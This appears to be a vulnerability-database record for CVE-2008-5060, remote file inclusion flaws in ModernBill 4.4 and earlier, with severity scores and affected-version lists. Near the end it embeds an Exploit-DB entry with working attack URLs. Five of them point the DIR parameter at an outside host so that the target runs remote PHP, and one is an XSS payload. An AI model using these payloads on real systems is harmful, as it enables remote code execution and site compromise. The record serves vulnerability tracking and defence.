ID CVE-2008-5060Type cveReporter cve@mitre.orgModified 2017-09-29T01:32:00
Description
Multiple PHP remote file inclusion vulnerabilities in ModernBill 4.4 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the DIR parameter to (1) export_batch.inc.php, (2) run_auto_suspend.cron.php, and (3) send_email_cache.php in include/scripts/; (4) include/misc/mod_2checkout/2checkout_return.inc.php; and (5) include/html/nettools.popup.php, different vectors than CVE-2006-4034 and CVE-2005-1054.
{"id": "CVE-2008-5060", "bulletinFamily": "NVD", "title": "CVE-2008-5060", "description": "Multiple PHP remote file inclusion vulnerabilities in ModernBill 4.4 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the DIR parameter to (1) export_batch.inc.php, (2) run_auto_suspend.cron.php, and (3) send_email_cache.php in include/scripts/; (4) include/misc/mod_2checkout/2checkout_return.inc.php; and (5) include/html/nettools.popup.php, different vectors than CVE-2006-4034 and CVE-2005-1054.", "published": "2008-11-13T11:30:00", "modified": "2017-09-29T01:32:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5060", "reporter": "cve@mitre.org", "references": ["http://secunia.com/advisories/32529", "https://www.exploit-db.com/exploits/6916", "http://securityreason.com/securityalert/4587", "https://exchange.xforce.ibmcloud.com/vulnerabilities/46513"], "cvelist": ["CVE-2008-5060"], "type": "cve", "lastseen": "2020-12-09T19:28:26", "edition": 5, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:6916"]}], "modified": "2020-12-09T19:28:26", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2020-12-09T19:28:26", "rev": 2}, "vulnersScore": 8.0}, "cpe": ["cpe:/a:modernbill:modernbill:4.1.1", "cpe:/a:modernbill:modernbill:4.0.1", "cpe:/a:modernbill:modernbill:4.1.3", "cpe:/a:modernbill:modernbill:4.3.2", "cpe:/a:modernbill:modernbill:3.1.3", "cpe:/a:modernbill:modernbill:4.0.2", "cpe:/a:modernbill:modernbill:4.4.0", "cpe:/a:modernbill:modernbill:3.0", "cpe:/a:modernbill:modernbill:4.1.2", "cpe:/a:modernbill:modernbill:2.01", "cpe:/a:modernbill:modernbill:3.1.0", "cpe:/a:modernbill:modernbill:4.2.1", "cpe:/a:modernbill:modernbill:4.3.0", "cpe:/a:modernbill:modernbill:4.4", "cpe:/a:modernbill:modernbill:2.02s"], "affectedSoftware": [{"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "3.1.3"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "4.0.1"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "4.0.1"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "4.1.1"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "4.0.2"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "le", "version": "4.4"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "3.1.0"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "4.1.2"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "4.3.2"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "le", "version": "4.4.0"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "2.01"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "4.1.3"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "4.2.1"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "4.3.0"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "3.0"}, {"cpeName": "modernbill:modernbill", "name": "modernbill", "operator": "eq", "version": "2.02s"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:modernbill:modernbill:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:2.01:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.0.1:rc8:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.4:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:2.02s:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:3.0:beta:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.0.1:rc7:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:modernbill:modernbill:4.0.2:*:*:*:*:*:*:*"], "cwe": ["CWE-94"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:2.01:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:3.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.0.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.0.1:rc7:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.4:*:*:*:*:*:*:*", "versionEndIncluding": "4.4", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:3.1.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:2.02s:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.3.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.4.0:*:*:*:*:*:*:*", "versionEndIncluding": "4.4.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.2.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:4.0.1:rc8:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:modernbill:modernbill:3.0:beta:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"exploitdb": [{"lastseen": "2016-02-01T00:57:47", "description": "ModernBill <= 4.4.x XSS / Remote File Inclusion Vulnerability. CVE-2008-5059,CVE-2008-5060. Webapps exploit for php platform", "published": "2008-10-31T00:00:00", "type": "exploitdb", "title": "ModernBill <= 4.4.x - XSS / Remote File Inclusion Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5060", "CVE-2008-5059"], "modified": "2008-10-31T00:00:00", "id": "EDB-ID:6916", "href": "https://www.exploit-db.com/exploits/6916/", "sourceData": "**************************************************************************************\nModernBill .:. Client Billing System - User Login\nModernBill <= v4.4.X Remote File Inclusion Vulnerability and xss by nigh7f411\nhttp://xc0r3.net/\nplezz go to ttp://xc0r3.net/forums/\n**************************************************************************************\n\nrfi\nhttp://poop.com/include/scripts/export_batch.inc.php?DIR=http://xc0r3.net/x2300.txt?\nhttp://poop.com/include/scripts/run_auto_suspend.cron.php?DIR=http://xc0r3.net/x2300.txt?\nhttp://poop.com/include/scripts/send_email_cache.php?DIR=http://xc0r3.net/x2300.txt?\nhttp://poop.com/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://xc0r3.net/x2300.txt?\nhttp://poop.com/include/html/nettools.popup.php?DIR=http://xc0r3.net/x2300.txt?\n\nxss\nhttp://poop.com/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language=\"+onmouseover=alert(39660.2316362732)+/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language=\"+onmouseover=alert(39660.2316362732)+\n\n**************************************************************************************\n\n# milw0rm.com [2008-10-31]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6916/"}]}
